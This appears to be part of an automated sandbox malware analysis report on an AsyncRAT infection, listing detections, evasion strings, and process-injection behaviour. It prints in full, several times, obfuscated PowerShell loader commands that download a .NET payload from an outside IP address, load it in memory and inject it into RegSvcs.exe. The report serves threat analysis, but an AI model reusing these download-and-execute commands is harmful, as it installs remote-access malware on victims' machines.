            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1989Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1125Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3572Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3801Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6249Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3601Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300Thread sleep count: 3572 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3300Thread sleep count: 3801 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
            Source: RegSvcs.exe, 00000004.00000002.2958104515.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: powershell.exe, 00000003.00000002.1707163230.000001851D005000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_4312.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            .NET source code references suspicious native API functions
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
            Source: 3.2.powershell.exe.1851cfe0000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E88008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bx gs dgb3 hi i 9 c jw w cc ow k gk yqbx hu yw g d0 i n cu c b6 ee ywbp gc sqbu e0 cg l cc owbb ei eqb0 gu wwbd f0 i k hk dwbq gq a g d0 i bb hm eqbz hq zqbt c4 qwbv g4 dgbl hi d bd do ogbg hi bwbt ei yqbz gu ng 0 fm d by gk bgbn cg i o e4 zqb3 c0 twbi go zqbj hq i bo gu d u fc zqbi em b bp gu bgb0 ck lgbe g8 dwbu gw bwbh gq uwb0 hi aqbu gc k n gg d b0 h og v c8 oq x c4 mg w di lg y dm mw u de ng 5 c8 v bh gs lwbs gu zw v e0 yqby ho lwbe fi rw v fi v bd c8 rg z gq b bs c4 d b4 hq jw p ck owbb hm eqbz hq zqbt c4 qqbw h r bv g0 yqbp g4 xq 6 do qwb1 hi cgbl g4 d be g8 bqbh gk bg u ew bwbh gq k k hk dwbq gq a p c4 rwbl hq v b5 h zq o cc qwbs ge cwbz ew aqbi hi yqby hk mq u em b bh hm cw x cc kq u ec zqb0 e0 zqb0 gg bwbk cg jwba hg swbi ec jw p c4 sqbu hy bwbr gu k k g4 dqbs gw l g fs bwbi go zqbj hq wwbd f0 i o cc d b4 hq lg x eo r v fm vgbo eu lwb6 hi yqbn c8 zwbl fi lwbr ge v v dk ng x c4 mw z di lg y d mg u de oq v c8 ogbw hq d bo cc i s c j bp ge cqb1 gm i s c jwbs gc dgb1 ec jw s c j bx gs dgb3 hi l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'c:\users\user\desktop\sostener.vbs';[byte[]] $ywjdh = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('http://91.202.233.169/tak/reg/marz/drg/rtc/f3dll.txt'));[system.appdomain]::currentdomain.load($ywjdh).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1jd/svne/zram/ger/kat/961.332.202.19//:ptth' , $iaquc , 'rgvug', $qkvwr, '1', 'roda' ));"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bx gs dgb3 hi i 9 c jw w cc ow k gk yqbx hu yw g d0 i n cu c b6 ee ywbp gc sqbu e0 cg l cc owbb ei eqb0 gu wwbd f0 i k hk dwbq gq a g d0 i bb hm eqbz hq zqbt c4 qwbv g4 dgbl hi d bd do ogbg hi bwbt ei yqbz gu ng 0 fm d by gk bgbn cg i o e4 zqb3 c0 twbi go zqbj hq i bo gu d u fc zqbi em b bp gu bgb0 ck lgbe g8 dwbu gw bwbh gq uwb0 hi aqbu gc k n gg d b0 h og v c8 oq x c4 mg w di lg y dm mw u de ng 5 c8 v bh gs lwbs gu zw v e0 yqby ho lwbe fi rw v fi v bd c8 rg z gq b bs c4 d b4 hq jw p ck owbb hm eqbz hq zqbt c4 qqbw h r bv g0 yqbp g4 xq 6 do qwb1 hi cgbl g4 d be g8 bqbh gk bg u ew bwbh gq k k hk dwbq gq a p c4 rwbl hq v b5 h zq o cc qwbs ge cwbz ew aqbi hi yqby hk mq u em b bh hm cw x cc kq u ec zqb0 e0 zqb0 gg bwbk cg jwba hg swbi ec jw p c4 sqbu hy bwbr gu k k g4 dqbs gw l g fs bwbi go zqbj hq wwbd f0 i o cc d b4 hq lg x eo r v fm vgbo eu lwb6 hi yqbn c8 zwbl fi lwbr ge v v dk ng x c4 mw z di lg y d mg u de oq v c8 ogbw hq d bo cc i s c j bp ge cqb1 gm i s c jwbs gc dgb1 ec jw s c j bx gs dgb3 hi l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'c:\users\user\desktop\sostener.vbs';[byte[]] $ywjdh = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('http://91.202.233.169/tak/reg/marz/drg/rtc/f3dll.txt'));[system.appdomain]::currentdomain.load($ywjdh).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1jd/svne/zram/ger/kat/961.332.202.19//:ptth' , $iaquc , 'rgvug', $qkvwr, '1', 'roda' ));"Jump to behavior
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
